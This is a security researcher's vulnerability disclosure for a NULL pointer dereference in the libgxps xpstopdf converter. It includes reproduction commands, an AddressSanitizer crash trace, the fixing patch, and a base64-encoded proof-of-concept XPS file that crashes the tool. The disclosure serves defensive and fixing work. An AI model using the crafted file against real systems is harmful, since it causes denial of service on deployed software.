|=----------------------------------------------------------------------------=| |=-----------------------=[ Vulnerability Disclosure ]=-----------------------=| |=--------=[ GNOME/libgxps: Mishandle NULL pointer in the converter ]=--------=| |=----------------------------------------------------------------------------=| |=-----------------------=[ Thu 03 Feb 2021 10:21:20 ]=-----------------------=| |=--------=[ https://qiuhao.org/VD_GNOME_libgxps_converter_NULL.txt ]=--------=| |=----------------------------------------------------------------------------=| -- [ Description During fuzzing, we found gxps_converter_print_converter_end_document() in gxps-print-converter.c doesn't check if converter->surface == NULL, which could lead to DoS if someone use this routine to handle a crafted xps file. -- [ Affected * master branch, 19 Aug 2020, 6bf9be28 * Package: libgxps-dev, libgxps-utils, Version: 0.3.1 -- [ Reproduce * Reproduce with the package libgxps-utils: $ sudo apt install libgxps-utils $ xpstopdf ./PoC.xps # xpstops, xpstops, xpstosvg Error getting page 1: Page source /Documents/1/Pages/1.fpage not found in archive Segmentation fault (core dumped) * Reproduce with an executable built with ASAN: $ ./libgxps/builddir_asan/tools/xpstopdf ./PoC.xps /dev/null Error getting page 1: Page source /Documents/1/Pages/1.fpage not found in archive AddressSanitizer:DEADLYSIGNAL ================================================================= ==4153405==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7ffff7ac9694 bp 0x7fffffffe730 sp 0x7fffffffe5f8 T0) ==4153405==The signal is caused by a READ memory access. ==4153405==Hint: address points to the zero page. #0 0x7ffff7ac9694 in cairo_surface_status (/lib/x86_64-linux-gnu/libcairo.so.2+0x77694) #1 0x305734 in gxps_converter_print_converter_end_document /home/ubuntu/libgxps/builddir_asan/../tools/gxps-print-converter.c:216:18 #2 0x302333 in gxps_converter_end_document /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter.c:188:17 #3 0x302333 in gxps_converter_run /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter.c:332:9 #4 0x2fe031 in main /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter-main.c:40:9 #5 0x7ffff76e70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x2528ad in _start (/home/ubuntu/libgxps/builddir_asan/tools/xpstopdf+0x2528ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libcairo.so.2+0x77694) in cairo_surface_status ==4153405==ABORTING -- [ Patch From 2d2e27caaa951697baf4846bfb13f85fcb8c5110 Mon Sep 17 00:00:00 2001 From: Qiuhao Li Date: Wed, 3 Feb 2021 22:58:51 +0800 Subject: [PATCH] tools: check whether converter->surface is NULL --- tools/gxps-print-converter.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/gxps-print-converter.c b/tools/gxps-print-converter.c index a4f2e13..807ce8e 100644 --- a/tools/gxps-print-converter.c +++ b/tools/gxps-print-converter.c @@ -212,6 +212,8 @@ gxps_converter_print_converter_end_document (GXPSConverter *converter) GXPSPrintConverter *print_converter = GXPS_PRINT_CONVERTER (converter); cairo_status_t status; + if (converter->surface == NULL) + return; cairo_surface_finish (converter->surface); status = cairo_surface_status (converter->surface); if (status) -- 2.25.1 -- [ PoC.xps $ base64 PoC.xps UEsDBDAwMDAIMDAwMDAMhio9lQAAALMAAAAeAAAARG9jdW1lbnRzLzEvRml4ZWREb2N1bWVudC5m ZG9jVY1BCsIwFET3gncof29+KigijV0orgVPUNLfNmDyS38qvZsLj+QVTBYuXM0wzJv5vN5VvfhH 8aRJHAcDpdJQULDcutAbmGO3OUB9Wq+qq1uovbCdPYVYJCiIgSHG8YgodiDfiPLOTizcRWXZ4zIK brXeod5DXrg1PZ05xMzfeZ4sGcDfomCJuZBUdWMygJnBv9uUfAFQSwMEMDAwMAgwMDAwMAAiJ8aY AAAAzgAAABsAAABGaXhlZERvY3VtZW50U2VxdWVuY2UuZmRzZXFtjk0KwjAQhfeCdyizN5MKikhj N+IB7AkkndiAydT8SO/mwiN5BVuhC8H1e9/33vv5qurB3YoHhWjZKyiFhIK85tb6q4KczGoH9WG5 qE52oPbIOjvyqaF7HltUjLCPCrqU+j1i1B25SxTO6sCRTRKaHQ59xLWUG5RbmEyz5EyGwtfScA6a FOAcRSzxZ1CYljXghOPfJ2PyAVBLAwQwMDAwCDAwMDAwwNFXvcUAAAAWAQAACwAAAF9yZWxzLy5y ZWxzZY9LbsIwEIb3lbiDNXsyKVIrVOGyqZDYUi5gOePEKn7gcVB6ti56pF6hE1bQLuf1/d/8fH1v tlM4qQsV9ilqeGxaUBRt6nzsNYzVLdewfV08bA50MlV2ePCZlRxF1jDUml8Q2Q4UDDcpU5SJSyWY KmXpMRv7YXrCVds+Y7llwF+qOprSU9WAOz9R95bsGCjWdzqPYkSN65jOoPadhoNYHj8z/TMI3pbE ydXGpoBT5jn4CSXbzcxCuRAL9BoKOCvg3WfS+QU= Update, Thu, 04 Feb 2021 09:27:56 +0000: Patch Committed - https://gitlab.gnome.org/GNOME/libgxps/-/commit/d32d6026c9fb545ef608e4afd964ad0dae14bef5